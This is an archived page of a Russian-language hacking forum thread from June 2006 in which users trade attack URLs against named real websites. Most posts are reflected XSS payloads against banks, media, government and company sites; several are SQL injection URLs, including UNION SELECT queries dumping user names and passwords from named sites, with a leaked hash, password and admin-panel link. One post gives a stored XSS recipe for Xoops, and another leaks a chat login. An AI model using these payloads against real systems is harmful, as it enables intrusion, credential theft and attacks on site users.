Баги на сайтах. [Архив] - Страница 2

degeneration x

19.06.2006, 02:18

_http://www.byz.ru/simpsons.php?id=&kat_id=-18+union+select+1,2,user_name,user_password,5,6,7, 8,9,10,11,12+from+users/*

d3dde2723247d8d5fc3f76dceb3d4324;jasmin

Dracula4ever

19.06.2006, 17:12

_http://www.tatalc.ru/index.php?page=11'

_http://avtostudio-orel.ru/avtozvuk/descr.php?what=avtmgn&firma=Aiwa&model=CDC-R30'4

_http://www.kit-s.ru/index.php?page_id=tov&g_id=ID00016810&t_v=1'

blackybr

19.06.2006, 20:00

_http://www.ic3.gov/search.aspx?q=%22%3E3Cscript%3Ealert(%27XSS%27)%3C/script%3E (уберите пробел между 3C/ и /script)
это сайт расследований компрьютерных преступлений ))))))) как написано на сайте - совместный проект фбр и какой-то National White Collar Crime Center (NW3C)

Dracula4ever

19.06.2006, 20:26

_http://www.notoshoes.ru/singl.php?tp=2&p=7&tid=3340'0

ZINGER

20.06.2006, 00:25

еще одна хсс на майле
http://foto.mail.ru/mail/lena_cher2004/1/?page="><script>alert()</script>

Nova

20.06.2006, 23:31

А вот и сайт банка Приват Банк
_http://www.pbank.com.ua/info/search/searchresult.stm?mode=name&title=*"><script>alert()</script>%20*

Dracula4ever

21.06.2006, 09:52

_http://www.gm-avtovaz.ru/new_ru/index.php?pointer=146&page=informDetal&flashMenu=n

_http://www.bossmag.ru/view.php?oth=%C1%EE%F1%F1-IT&n=01&y=200'5

_http://www.rpso.ru/content.php?page=qjvqlxbz&id=2'

_http://inews.spb.ru/issue.php?id=94173113205480'8

_http://www.comptorg.ru/index.php?action=price&id=41'

_http://www.master-it.ru/news/content.phtml?aid=2&level=2'

_http://www.gazot.ru/phone.php?idrub=7'

_http://www.autonomia.ru/index.php?action=show_car&key=8'0

_http://france2.samara.ws/new_php/gazeta.php

_http://tesi.seu.ru/?&section=14&part=33&page=125&tdf=10&t=185&f=1'

_http://larifem.ru/dogs.php?sh=3'

_http://www.x-bikers.ru/bikera/anketa_bikera.php?id=4385'

_http://www.starjob.ru/index.php?id=3&subid=2&action=show_resume&r_id=13&ss=IGFjdHVhbD0x&ff=&orderby=&page=&PHPSESSID=fafbb6cce89e2ff5b5955b2646b6'2eae

_http://www.argentina.ru/index.php?action=s&id=103'7

_kREveDKo_

21.06.2006, 12:40

_http://chat.ru/user/register.html?name="><script>alert(/6/)</script>&name1="><script>alert(/5/)</script>&name2="><script>alert(/4/)</script>&username="><script>alert(/3/)</script>&anotherpw="><script>alert(/2/)</script>&city="><script>alert(/1/)</script>

Dracula4ever

21.06.2006, 13:19

XSS на faqs.org.ru

_http://faqs.org.ru/cgi-bin/search?text="><script>alert()</script>

Micr0b

21.06.2006, 17:44

_http://www.name.net/index.php?error='><script>alert()</script>
_http://recherche.globetrotter.net/search/french/results.do?q=%27%3E%3Cscript%3Ealert%28%29%3C%2Fsc ript%3E

Dracula4ever

21.06.2006, 17:59

_http://www.mo.com.ua/search.php?sw="><script>alert()</script>

Micr0b

21.06.2006, 18:27

Вот нашел баг Xss на сайте телеканала ИНТЕР
в Украине...

_http://www.inter.ua/ua/search/?lang='><script>alert('HakNet')</script>
----------------------------------------------------
Вот нашел баг Xss на сайте телеканала ICTV
в Украине...

_http://ictv.ua/ukr/search.php?search=1&news_search=1&news_search_words=&news_search_cond=&news_search_exact=&news_search_numrows=&search_section_id=0&search_words=%27%3E%3Cscript%3Ealert%28%27HakNet%2 7%29%3C%2Fscript%3E&search_cond=1&search_exact=1&search_numrows=5

Dracula4ever

21.06.2006, 18:39

HakNet не плохо.

Вот мой баг XSS на сайте transnavi :

_http://www.transnavi.com/search/?search_key="><script>alert()</script>

Micr0b

21.06.2006, 19:07

_http://www.context-ua.com/cgi-bin/query?text='><script>alert('HakNet')</script>

_http://your-radio.dp.ua/modules.php?name=News&file=search&query='><script>alert('HakNet')</script>

_http://nrcu.gov.ua/search.php?id_main=1&where=1&search='><script>alert('HakNet')</script>

http://parlament.org.ua - в поиску вказать '><script>alert('HakNet')</script>

Micr0b

21.06.2006, 19:57

Кароче нашел глюченой чат ...
Простите чо в етом розделе...но просто пашет прикольно XSS

link: http://www.elib.ru/cgi-bin/Chat.pl

login: lol
pass: 1988

ожно и не только ето
'><script>alert('HakNet')</script>
а и много другого...))) пашет всё.. :)

Micr0b

21.06.2006, 20:05

Ну бедный дядюшка Disney и на его сайте есть XSS

http://search.disney.go.com/?oq='><script>alert('HakNet')</script>

Micr0b

21.06.2006, 20:42

Вот Xss на журнале НАТАЛИ в Украине
http://www.natali.ua/materials/search/%20"><script>alert()</script>

LoFFi

21.06.2006, 20:57

Бесполезно, но улыбнуло =)
http://www.blizzard.com/support/wow/?id=aww01671p'

Dracula4ever

22.06.2006, 10:59

_http://search.finam.ru/cgi-bin/ff.pl?query="><script>alert('dracula4ever')</script>

Dracula4ever

22.06.2006, 22:16

_http://www.myjane.ru/search/default.asp?searchword="><script>alert('dracula4ever')</script>

Dracula4ever

23.06.2006, 12:05

http://forum.antichat.ru/forum46.html
Блин че с ачатом

А че с ним должно быть????

Вот ещё несколько XSS :

_http://lib.usu.ru/search/?search%5Bquery%5D="><script>alert()</script>

_http://ncagip.ru/search?needle="><script>alert()</script>

Dracula4ever

23.06.2006, 21:44

_http://kungrad.com/index/search/?keywords="><script>alert()</script>

Dracula4ever

24.06.2006, 08:01

_http://www.uefexpo.ru/?p__search_text2="><script>alert()</script>

CyberPunk

24.06.2006, 09:31

_http://www.opentech.ru/index.php?curr_node='

Dracula4ever

24.06.2006, 11:52

_http://www.membrana.ru/search.html?text="><script>alert()</script>

blackybr

24.06.2006, 19:53

http://www.sapphiretech.com/rs/media/pressview.php?pid=25' производство карт радеон сапфир )

Dracula4ever

24.06.2006, 20:39

_http://www.uefexpo.ru/?p__search_text2="><script>alert()</script>

_kREveDKo_

24.06.2006, 23:35

Маленький баг в Xoops v2.0.13.2 : Активная XSS

Заходим в редактирование профиля и с помощью IE_XSS_KIT от zFailure кликаем в менюшке на
"Form Select-one2Text". Ищем поле "Comments Display Mode" и меняем то что там написано на
"><h1>XSS!. Теперь если мы пройдём по адресу

http://xex.ru/путь_к_xoops/modules/mylinks/singlelink.php?cid=3&lid=1

и нажмём на "Comments", nо при условии, что в движке включён модуль для работы с ссылками,
мы сможем лицезреть активную XSS. Почему я назвал это Маленьким багом? Потому что вместительность
переменной, куда мы вставили сплойт составляет 10 символов =).

Dracula4ever

25.06.2006, 09:11

_http://www.nlr.ru/udmsearch.zhtml?q="><script>alert()</script>

_kREveDKo_

25.06.2006, 13:23

http://bluejack.ru/cgi-bin/show_user.pl?searchstr=%22%3E%3Cscript%3Ealert%28% 29%3C%2Fscript%3E

Dracula4ever

25.06.2006, 13:38

На таком знаменитом сайте такие знаменитые баги :-)

_http://rusdoc.kulichki.ru/public/search.shtml?searWords="><script>alert()</script>

Dracula4ever

25.06.2006, 17:41

Мне очень понравился этот баг:
_http://www.sprandi.ru/search?q="><script>alert()</script>

XSS Rulezzz!!!

Micr0b

25.06.2006, 17:52

http://www.rupoisk.ru/index.php?search_string=%27%3E%3Cscript%3Ealert%28 %29%3C%2Fscript%3E

Dracula4ever

25.06.2006, 17:59

_http://www.mediexpo.ru/search/?q="><script>alert()</script>

Dracula4ever

26.06.2006, 12:57

_http://magnolia-tv.com/search/?target=news&search="><script>alert()</script>

Dracula4ever

26.06.2006, 16:21

Непонимаю какой смысл т хсс вас это что радует если вы увидете алерТ?
Да блять напишите программу <script>
while(1){
alert('Нажимаю ок пока не заипет');
}</script>
И фтыкайте пока не забудете что такое хсс.
Какой смысл от этой безталковой уязвимости постить всякую хрень на форуме набирая посты..Заипало.
Не обращайте внимания у меня дипресняк..

На:
_http://ncagip.ru/search?needle="><script>while(1){alert();}</script>

Dracula4ever

26.06.2006, 22:20

Ну давай стырь мои куки попробуй..

зачем?

_http://www.volgatelecom.kirov.ru/search/?q="><script>while(1){alert();}</script>

fjuDao

26.06.2006, 23:05

Motorola RU - неожидал

_http://www.motorola.ru/pcomm.php?id=33&action=hole&newsid=3122666+UNION+SELECT+0,0,0,name,password,0, 0,0,0,0,0,0,0,0,0+FROM+users/*

логин и пароль(в чистом виде) к админке:

_http://www.motorola.ru/admin/

:)

Rebz

26.06.2006, 23:20

да, но:
safe_mode: ON PHP version: 4.3.11 cURL: OFF MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
Disable functions : dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit

Dracula4ever

27.06.2006, 10:31

_http://www.priorbank.by/r/?item=270&text="><script>alert()</script>

Dracula4ever

27.06.2006, 12:46

_http://www.ac-studio.ru/tools/search/?text="><script>alert()</script>

Kaban

27.06.2006, 13:43

красивый дизайн у сайтов! =)

_http://www.cenmax.ru/search.html?q='><script>alert(/kaban/)</script>

_http://oriole.ru/search.html?q='><script>alert(/kaban/)</script>

_http://sentry.ru/search.html?q='><script>alert(/kaban/)</script>

_http://inspector-alarm.ru/search.html?q='><script>alert(/kaban/)</script>

Kaban

27.06.2006, 15:40

_http://www.military-loan-savvy.com/military-personal-loans.html?source=yahoo&campaign - алерт в поисковике

_http://usmcshop.grunt.com/Grunt/ в поисковике алерт

Dracula4ever

27.06.2006, 17:17

_http://www.stepbystep.com.ua/rus/search/?query="><script>alert()</script>

m0nzt3r

27.06.2006, 17:27

Короче учитывая мнения многих юзеров, временно закрываю темку, до тех пор пока с модерами не обсудим.Многие правы, нефиг стоко пассив хсс выкладывать, вот чел выложил баг на мотороле, респект ему.
2dracula: а ты заипал со своими хсс-ками пассивными + каждый в отдельном посте...
ТЕМА ЗАКРЫТА ВРЕМЕННО.

Tem

27.06.2006, 22:30

Согласен довно хотел тоже сказать, эти ксс вообше сидят в горле, нужна обсудить и сделать так что бы были реальные баги , а не пасивные ксс.